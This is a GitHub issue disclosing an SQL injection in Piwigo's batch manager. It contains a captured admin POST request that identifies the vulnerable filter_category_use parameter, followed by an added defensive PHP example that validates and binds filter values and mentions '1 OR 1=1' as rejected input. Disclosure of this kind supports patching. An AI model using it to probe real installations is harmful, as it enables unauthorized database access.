SQL injection in admin/batch_manager.php #1012

Closed
zongdeiqianxing opened this issue May 8, 2019 · 1 comment

@zongdeiqianxing

Hi, there is a vulnerability in admin/batch_manager.php.

I didn't find the full trigger request in the browser, so I added the ‘&filter_category_use=on’ parameter to the request based on the code.

POST /admin.php?page=batch_manager HTTP/1.1
Host: 10.150.10.186:30002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.150.10.186:30002/admin.php?page=batch_manager
Content-Type: application/x-www-form-urlencoded
Content-Length: 695
Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=85b6lvm6f6nqvji17k04ugkdu0
Connection: close
Upgrade-Insecure-Requests: 1

start=0&pwg_token=438d258aad10f5b13c74425475163e4e&filter_prefilter_use=on&filter_prefilter=last_import&filter_duplicates_date=on&filter_category=1&tag_mode=AND&filter_level=03&filter_dimension_min_width=145&filter_dimension_max_width=2560&filter_dimension_min_height=91&filter_dimension_max_height=1440&filter_dimension_min_ratio=1.29&filter_dimension_max_ratio=1.77&filter_search_use=on&q=&filter_filesize_use=on&filter_category_use=on&filter_filesize_min=1.3&filter_filesize_max=1.3&submitFilter=&selectAction=-1&associate=1&dissociate=1&author=&title=&date_creation=2019-05-08+00%3A00%3A00&level=0&regenerateSuccess=0&regenerateError=0

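The report above shows the batch manager accepting filter values straight from a POST body. As an added illustration (this is not Piwigo's code and not the project's fix), the following PHP shows the defensive pattern that stops this class of bug: every filter value is validated against the type or range it is supposed to have, and the accepted value is bound as a query parameter instead of being spliced into the SQL text. The parameter names mirror the captured request; the table and column names (`images`, `image_category`, `i.level`, `i.width`, and so on) are assumptions made for the example.

```php
<?php
// Added example, not Piwigo's code. Validate batch-manager-style filter
// parameters and bind them, so request data never becomes SQL text.
// Table/column names below are assumptions for illustration.

function build_filter_query(array $post): array
{
    $where  = [];
    $params = [];

    // Category filter: honoured only when the "use" checkbox is set, and the
    // id must be a positive integer (rejects anything like "1 OR 1=1").
    if (isset($post['filter_category_use'])) {
        $cat = filter_var($post['filter_category'] ?? '', FILTER_VALIDATE_INT,
                          ['options' => ['min_range' => 1]]);
        if ($cat === false) {
            throw new InvalidArgumentException('filter_category must be a positive integer');
        }
        $where[] = 'i.id IN (SELECT image_id FROM image_category WHERE category_id = :category_id)';
        $params[':category_id'] = $cat;
    }

    // Privacy level: the form sends "03", which FILTER_VALIDATE_INT rejects
    // because of the leading zero, so accept digits only and range-check.
    if (isset($post['filter_level']) && $post['filter_level'] !== '') {
        $raw = (string) $post['filter_level'];
        if (!ctype_digit($raw) || (int) $raw > 8) {
            throw new InvalidArgumentException('filter_level out of range');
        }
        $where[] = 'i.level = :level';
        $params[':level'] = (int) $raw;
    }

    // Dimension bounds: pixel sizes must be integers, ratios must be floats.
    $numeric = [
        'filter_dimension_min_width'  => ['i.width >= :min_width',   ':min_width',  FILTER_VALIDATE_INT],
        'filter_dimension_max_width'  => ['i.width <= :max_width',   ':max_width',  FILTER_VALIDATE_INT],
        'filter_dimension_min_height' => ['i.height >= :min_height', ':min_height', FILTER_VALIDATE_INT],
        'filter_dimension_max_height' => ['i.height <= :max_height', ':max_height', FILTER_VALIDATE_INT],
        'filter_dimension_min_ratio'  => ['i.width / i.height >= :min_ratio', ':min_ratio', FILTER_VALIDATE_FLOAT],
        'filter_dimension_max_ratio'  => ['i.width / i.height <= :max_ratio', ':max_ratio', FILTER_VALIDATE_FLOAT],
    ];
    foreach ($numeric as $field => [$sql, $name, $filter]) {
        if (!isset($post[$field]) || $post[$field] === '') {
            continue;
        }
        $value = filter_var($post[$field], $filter);
        if ($value === false) {
            throw new InvalidArgumentException("$field is not numeric");
        }
        $where[] = $sql;
        $params[$name] = $value;
    }

    // Only fixed SQL fragments are concatenated; user values live in $params.
    $sql = 'SELECT i.id FROM images i';
    if ($where) {
        $sql .= ' WHERE ' . implode(' AND ', $where);
    }
    return [$sql, $params];
}

// Usage with a constructed subset of the captured request body.
parse_str('start=0&filter_category_use=on&filter_category=1&filter_level=03'
        . '&filter_dimension_min_width=145&filter_dimension_min_ratio=1.29', $post);
[$sql, $params] = build_filter_query($post);
// Execute with a prepared statement, e.g.:
// $stmt = $pdo->prepare($sql); $stmt->execute($params);
```

The two checks that matter most are the `filter_var` cast on `filter_category` (the parameter the reporter had to add by hand) and the fact that `$where` only ever receives fixed strings; an unexpected value is rejected with an exception rather than reaching the database.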

@plegall plegall added this to the 2.9.6 milestone May 31, 2019
@plegall plegall changed the title Piwigo v2.9.5 - SQL injection in admin/batch_manager.php SQL injection in admin/batch_manager.php Aug 12, 2019
@plegall (Member)

plegall commented Aug 12, 2019

discovered on Piwigo v2.9.5

@plegall plegall self-assigned this Aug 12, 2019
@plegall plegall modified the milestones: 2.9.6, 2.10.0RC1 Aug 12, 2019